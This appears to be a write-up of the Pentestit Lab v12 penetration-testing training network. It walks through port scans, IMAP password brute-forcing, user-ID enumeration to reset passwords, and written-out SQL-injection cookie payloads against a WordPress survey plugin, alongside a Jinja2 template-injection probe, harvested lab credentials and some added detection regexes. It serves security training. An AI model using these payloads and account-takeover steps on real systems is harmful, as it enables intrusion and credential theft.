Testing Pentestit Lab v12

Pentestit Lab v12

Connection method: a foreign host + OpenVPN (ss + OpenVPN is painful)
Goal: capture the 12 flags
Project URL: https://lab.pentestit.ru

Login complete. The two gateways provided by the lab are 192.168.101.12 and 192.168.101.13.

192.168.101.13 internal network

nmap goes first

```
[root@cloud ~]# nmap -T4 -A -v -p- 192.168.101.12
PORT STATE SERVICE VERSION
25/tcp open smtp Postfix smtpd
|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error
80/tcp open http nginx 1.16.0
|_http-methods: No Allow or Public header in OPTIONS response (status code 403)
|_http-title: 403 Forbidden
143/tcp open imap Dovecot imapd
|_imap-capabilities: more ENABLE have AUTH=PLAIN IDLE IMAP4rev1 SASL-IR Pre-login listed AUTH=LOGINA0001 post-login LITERAL+ LOGIN-REFERRALS capabilities OK ID
8080/tcp open http nginx
|_http-methods: No Allow or Public header in OPTIONS response (status code 301)
|_http-open-proxy: Proxy might be redirecting requests
| http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_Requested resource was http://192.168.101.12:8080/mail/
```

Save the results as nmap12.xml, then edit the hosts file:

```
root@hostker:~# vim /etc/hosts
192.168.101.12 site.test.lab
root@hostker:~# elinks http://site.test.lab
```

Port 80

```
root@kali:~# curl -i http://site.test.lab
<meta name="generator" content="WordPress 4.9.8" />
```

Information gathered so far:
e-mail: info@test.lab
Version: WordPress 4.9.8

Port 8080

```
root@hostker:~# elinks http://site.test.lab:8080
```

A webmail service.

Port 25

An SMTP server is running.

```
root@kali:~# telnet 192.168.101.12 25
Trying 192.168.101.12...
Connected to 192.168.101.12.
Escape character is '^]'.
220 mail.test.lab ESMTP Postfix
helo test.lab
250 mail.test.lab
```

Connected successfully.

Port 143

```
root@kali:~# telnet 192.168.101.12 143
Trying 192.168.101.12...
Connected to 192.168.101.12.
Escape character is '^]'.
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE AUTH=PLAIN AUTH=LOGIN] Dovecot ready.
```

Login is possible here.

Starting the test

Brute-forcing port 143

```
root@kali:~# brutespray -f Desktop/nmap12.xml -u info@test.lab -s imap
ACCOUNT CHECK: [imap] Host: 192.168.101.12 (1 of 1, 0 complete) User: info@test.lab (1 of 1, 0 complete) Password: 123456789 (1 of 100 complete)
ACCOUNT FOUND: [imap] Host: 192.168.101.12 User: info@test.lab Password: 123456789 [SUCCESS]
```

We now have an account: info@test.lab:123456789.
Log in on port 8080.
A complaint: the remote host is command-line only and I could not find a text browser with JavaScript support, so I had to fall back on the local machine.

openvpn-1

```
root@kali:~/Desktop/lv12# cat open.conf
client
dev tun
proto udp
remote 192.168.101.13 1194
auth-user-pass
resolv-retry infinite
persist-key
persist-tun
comp-lzo
verb 3
**********
-----END CERTIFICATE-----
</ca>
```

This is definitely an OpenVPN configuration.
Pay attention at every step of information gathering.
Try to connect:

```
root@kali:~/Desktop/lv12# openvpn --config open.conf
Enter Auth Username: info@test.lab
Enter Auth Password: *********
```

Host testing

Determine which hosts are present on the LAN:

```
root@kali:~# nmap -sn 172.16.0.0/16
Nmap scan report for 172.16.0.1
Host is up (0.37s latency).
Nmap scan report for 172.16.0.10
Host is up (0.36s latency).
Nmap scan report for 172.16.0.17
Host is up (0.38s latency).
Nmap scan report for 172.16.2.1
```

Excluding the two gateways, that leaves the following hosts.

172.16.0.10

```
root@kali:~# nmap -sC -sV 172.16.0.10
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.16.0
```

Port 80 is still the same site.

```
root@kali:~# wpscan --url site.test.lab -e u --random-user-agent
```

There is also a WAF, so a random User-Agent is used.
User enumeration confirms the user admin.

```
root@kali:~# wpscan --url site.test.lab -e p --random-user-agent
```

Plugin enumeration confirms wp-survey-and-poll, Version: 1.5.7.8.

```
root@kali:~# searchsploit 'wordpress Survey'
```

According to the PoC, the cookie is injectable:

```
wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,@@version,11#"]
```

Well, the WAF blocks it.

172.16.0.17

```
root@kali:~# nmap -sC -sV 172.16.0.17
Not shown: 861 closed ports, 123 filtered ports
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
| ssh-hostkey:
| 2048 52:41:88:d7:94:bb:9d:1d:db:fa:ed:ed:eb:ad:d2:15 (RSA)
|_ 256 72:92:c7:db:12:3c:16:ca:60:f8:48:ac:05:76:83:7d (ED25519)
25/tcp open smtp Postfix smtpd
|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol error\x0D
53/tcp open domain ISC BIND 9.10.3-P4 (Debian Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Debian
80/tcp open http nginx 1.16.0
|_http-server-header: nginx/1.16.0
|_http-title: 403 Forbidden
88/tcp open kerberos-sec Heimdal Kerberos (server time: 2019-08-11 12:03:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: TEST)
389/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:03:27+00:00; -55s from scanner time.
445/tcp open netbios-ssn Samba smbd 4.5.12-Debian (workgroup: TEST)
464/tcp open kpasswd5?
636/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:07:21+00:00; +3m00s from scanner time.
1024/tcp open msrpc Microsoft Windows RPC
3268/tcp open ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:04:22+00:00; -1s from scanner time.
3269/tcp open ssl/ldap (Anonymous bind OK)
| ssl-cert: Subject: commonName=AD.test.lab/organizationName=Samba Administration
| Not valid before: 2018-12-10T10:42:08
|_Not valid after: 2020-11-09T10:42:08
|_ssl-date: 2019-08-11T12:04:12+00:00; -10s from scanner time.
8080/tcp filtered http-proxy
```

Port 53 is open, so query the DNS records:

```
root@kali:~# dnsrecon -d test.lab -n 172.16.0.17 -a
[*] ns1.test.lab 172.16.0.17
[*] ns2.test.lab 172.16.2.10
[*] @.test.lab 172.16.0.17
[*] db.test.lab 172.16.0.30
[*] dc.test.lab 172.16.0.17
[*] helpdesk.test.lab 172.16.0.10
[*] ns2.test.lab 172.16.2.10
[*] my.test.lab 172.16.0.10
[*] ad.test.lab 172.16.0.17
[*] site.test.lab 172.16.0.10
[*] gc._msdcs.test.lab 172.16.0.17
[*] dns.test.lab 172.16.0.17
[*] A dns.test.lab 172.16.2.10
[*] ns1.test.lab 172.16.0.17
```

Add these names to local resolution (after adjusting the format).
Going through the domain names, helpdesk.test.lab has a login form.

**At work...**

samrdump.py can dump system user accounts, available shares and other sensitive information over the MSRPC service:

```
root@kali:~# python /usr/share/doc/python-impacket/examples/samrdump.py 172.16.0.17
```

After a little post-processing, the user list is:

```
Administrator@test.lab
info@test.lab
sviridov@test.lab
sidorov@test.lab
petrov@test.lab
lomonosov@test.lab
token_fopekr0mf@test.lab
```

OK, info@test.lab shows up again, with the default password 123456789.
While changing the password I noticed an ID value that looks a lot like Base64; presumably every user has a unique ID.

```
MTQ1Cg== --> 145
```

OK, there is a pitfall here in how the base64 value is produced: echo appends a newline, which is encoded too (the trailing Cg==), and the = padding has to be URL-encoded as %3D.

```
root@kali:~# echo 145 | base64 | sed 's/=/%3D/g'
MTQ1Cg%3D%3D
```

After conversion the value looks like this.
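The ID encoding seen above, as an added example that is not part of the original write-up: the value is only a base64-wrapped counter (plus the stray newline from echo), so it is enumerable, and encoding is not an access control. The helper functions and the `secret-token` sample are my own; `MTQ1Cg==` is the page's value.

```python
import base64
from urllib.parse import quote, unquote


def encode_id(user_id: int, trailing_newline: bool = True) -> str:
    """Base64-encode a numeric ID and URL-encode the '=' padding.

    trailing_newline=True mirrors `echo 145 | base64`: echo appends '\\n',
    and that newline is encoded too, which is where the 'Cg==' suffix
    comes from.
    """
    raw = f"{user_id}\n" if trailing_newline else str(user_id)
    b64 = base64.b64encode(raw.encode()).decode()
    return quote(b64, safe="")  # '=' becomes '%3D', as the sed call does


def decode_id(token: str) -> int:
    """Reverse the encoding; tolerate URL-encoding, the stray newline and
    missing padding."""
    b64 = unquote(token)
    b64 += "=" * (-len(b64) % 4)
    return int(base64.b64decode(b64).decode().strip())


def is_enumerable_id(token: str) -> bool:
    """True if the token is just an encoded small integer, i.e. a
    sequential identifier rather than a random, unguessable secret."""
    try:
        return 0 <= decode_id(token) < 10_000_000
    except (ValueError, UnicodeDecodeError):
        return False


if __name__ == "__main__":
    for n in (144, 145, 146):
        print(n, "->", encode_id(n), "->", decode_id(encode_id(n)))
    # A constructed opaque token, for contrast: base64 of "secret-token".
    print("c2VjcmV0LXRva2Vu", "enumerable?", is_enumerable_id("c2VjcmV0LXRva2Vu"))
```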
Use Burp to enumerate the IDs.
After the run, the password of sviridov@test.lab has become 123.
This yields a VPN account: sviridov@test.lab 5BEiBBtrNq***************

192.168.101.12 internal network

Change the IP to 192.168.101.12 and log in to the VPN.
TCP was scanned above; confirm that the port is open on UDP:

```
root@kali:~# nmap -sU -p- 192.168.101.12
PORT STATE SERVICE
1194/udp open openvpn
```

```
root@kali:~# openvpn --config sviridov.conf
Enter Auth Username: sviridov@test.lab
Enter Auth Password: *************************
```

Continue testing the domain names; my.test.lab has a login page.
info:123456789 logs in successfully.

SSTI injection

The search box turns out to be an SSTI injection point:

```
http://my.test.lab/?q={{7*7}} # using 7*7 and 7*'7' shows it is a Jinja2 template; tplmap can automate the injection and reveal some parameters
```

My personal notes on commonly used test parameters:

  • config: the current configuration object
  • request: the current request object
  • session: the current session object
  • g: the request-bound global object; developers typically use it to store resources for the duration of a request

Links to the API documentation: Flask, Jinja
Related reading: "Flask / Jinja2 SSTI && Python sandbox escape" and "A deep dive into SSTI: new bypass tricks from two Flask challenges at NCTF2018"
Supplying the config parameter returns:

```
'SECRET_KEY': '*************Wl2ZnZoei5wYnovcG5lcnJlZg=='
```

Phevbhf? aivfvhz.pbz/pnerref looks like a path but follows no naming convention; it is a Caesar cipher (a shift of 13, i.e. ROT13):

```
curious ?nvisium.com/careers

So it is a heavy-handed advertisement for https://nvisium.com/careers.
A Google search shows the trick behind it.
The person.secret parameter returns the ciphertext directly, but it is of no use.
Moving on:

```
root@kali:~# nmap -sn 172.16.0.0/16
Nmap scan report for 172.16.0.1
Host is up (0.39s latency).
Nmap scan report for ns2.test.lab (172.16.0.10)
Host is up (0.39s latency).
Nmap scan report for site.test.lab (172.16.0.14)
Host is up (0.42s latency).
Nmap scan report for ns1.test.lab (172.16.0.17)
Host is up (0.40s latency).
Nmap scan report for 172.16.1.10
Host is up (0.39s latency).
Nmap scan report for 172.16.1.12
Host is up (0.52s latency).
Nmap scan report for 172.16.1.15
Host is up (0.39s latency).
```

WordPress cookie injection

Following the hint, add 172.16.0.14 to the hosts file.
It is the same WordPress; continuing the cookie injection test, it finally works:

```
wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,database(),11#"]
```

Final payload:

```
wp_sap=["1650149780')) OR 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,convert(name,char),11 from wordpress.token #"]
```

This gives the final ciphertext fr5miRa****, but it is of no use.
Keep going.
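A detection-side example added here, not from the original write-up: minimal WAF-style rules that flag the two probes used above, the `?q={{7*7}}` template-injection test on my.test.lab and the `wp_sap` cookie injection against wp-survey-and-poll, run over constructed sample requests. The `Request` type and the sample traffic are assumptions of this example; the payload strings are the ones shown on this page.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import unquote_plus

# Jinja2 expression/statement delimiters, as in the ?q={{7*7}} probe.
SSTI_RE = re.compile(r"\{\{.+?\}\}|\{%.+?%\}", re.S)
# Quote-and-paren breakout followed by a tautology, or a UNION SELECT,
# as in the wp_sap cookie payload.
SQLI_RE = re.compile(
    r"'\s*\)+\s*(?:OR|AND)\s+\d+\s*=\s*\d+|\bUNION\s+(?:ALL\s+)?SELECT\b", re.I
)


@dataclass
class Request:
    """Constructed, minimal view of an HTTP request (hypothetical type)."""
    path: str
    query: str = ""
    cookies: dict = field(default_factory=dict)


def inspect(req: Request) -> list:
    """Return (kind, location) findings for SSTI or SQLi probes.

    Values are URL-decoded first, because clients usually send the
    braces and quotes percent-encoded.
    """
    findings = []
    if SSTI_RE.search(unquote_plus(req.query)):
        findings.append(("ssti", "query"))
    for name, value in req.cookies.items():
        if SQLI_RE.search(unquote_plus(value)):
            findings.append(("sqli", f"cookie:{name}"))
    return findings


# Constructed sample traffic modelled on the probes in this write-up.
SAMPLES = [
    Request("/", "q=%7B%7B7*7%7D%7D"),                          # SSTI test
    Request("/", "q=7*7"),                                      # benign search
    Request("/wp-admin/admin-ajax.php", "action=ajax_survey",
            {"wp_sap": '["1650149780\')) OR 1=2 UNION ALL SELECT '
                       '1,2,3,4,5,6,7,8,9,database(),11#"]'}),   # cookie SQLi
    Request("/", "", {"wp_sap": '["1650149780"]'}),             # normal poll cookie
]

if __name__ == "__main__":
    for r in SAMPLES:
        print(r.path, r.query, inspect(r) or "clean")
```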

Information gathering

Analyse the newly discovered IP addresses:

```
root@kali:~# nmap -sV -sC 172.16.0.14
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
| ssh-hostkey:
| 2048 52:41:88:d7:94:bb:9d:1d:db:fa:ed:ed:eb:ad:d2:15 (RSA)
|_ 256 3e:ca:73:6f:6e:3c:d0:2c:69:57:78:26:a4:d6:2a:08 (ECDSA)
80/tcp open http nginx/1.14.2
|_http-generator: WordPress 4.9.8
|_http-server-header: nginx/1.14.2
```

```
root@kali:~# nmap -T4 -A -v 172.16.1.10,12,15
Nmap scan report for 172.16.1.10
80/tcp open http
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: nginx/1.10.3
|_http-title: Site doesnt have a title (text/html; charset=utf-8).
Nmap scan report for 172.16.1.12
22/tcp open ssh
| ssh-hostkey:
| 2048 52:41:88:d7:94:bb:9d:1d:db:fa:ed:ed:eb:ad:d2:15 (RSA)
|_ 256 3e:ca:73:6f:6e:3c:d0:2c:69:57:78:26:a4:d6:2a:08 (ECDSA)
80/tcp open http
|_http-favicon: Unknown favicon MD5: BA84999DFC070065F37A082AB0E36017
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: [PREWIKKA]
Nmap scan report for 172.16.1.15
80/tcp open http
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=closed site
|_http-server-header: nginx/1.14.2
```

172.16.1.10
Found the ciphertext token=fw3mij3f****
172.16.1.12
Prewikka company ltd Prelude console.
It accepts the login sviridov 5BEiBBtrNq***************.
Browsing the log files reveals another account:
admin:IFGpajdlkmaw2of
172.16.1.15
Log in as admin.
This is just a place where files are stored.
It seems there is no way forward, but the 192.168.0.0 segment has not been explored yet:

```
root@kali:~# nmap -Pn -p21,22,80,139,445,8080 192.168.0.0/24
Nmap scan report for 192.168.0.10
Host is up (0.51s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.30
Host is up (0.79s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.100
Host is up (0.77s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.205
Host is up (0.37s latency).
PORT STATE SERVICE
22/tcp open ssh
--
Nmap scan report for 192.168.0.240
Host is up (0.37s latency).
PORT STATE SERVICE
22/tcp open ssh
```

SSH is open on almost all of them, so try the credentials already collected against these hosts.
On 192.168.0.100, sviridov@test.lab 5BEiBBtrNq*************** logs in successfully:

```
root@kali:~# ssh sviridov@192.168.0.100
sviridov@lomonosov:~$ id
uid=10002(sviridov) gid=10004(domain users) groups=10004(domain users),10001(BUILTIN\users)
```

The experiment stops here: privilege escalation was not workable because the network latency was far too high.

Summary

Information gathering is crucial: keep trying, again and again, to find attack vectors and then attempt to exploit them.

The end

If you find any errors, please contact lanbaidetanlang@qq.com
Nmap cheat sheet
WPScan cheat sheet
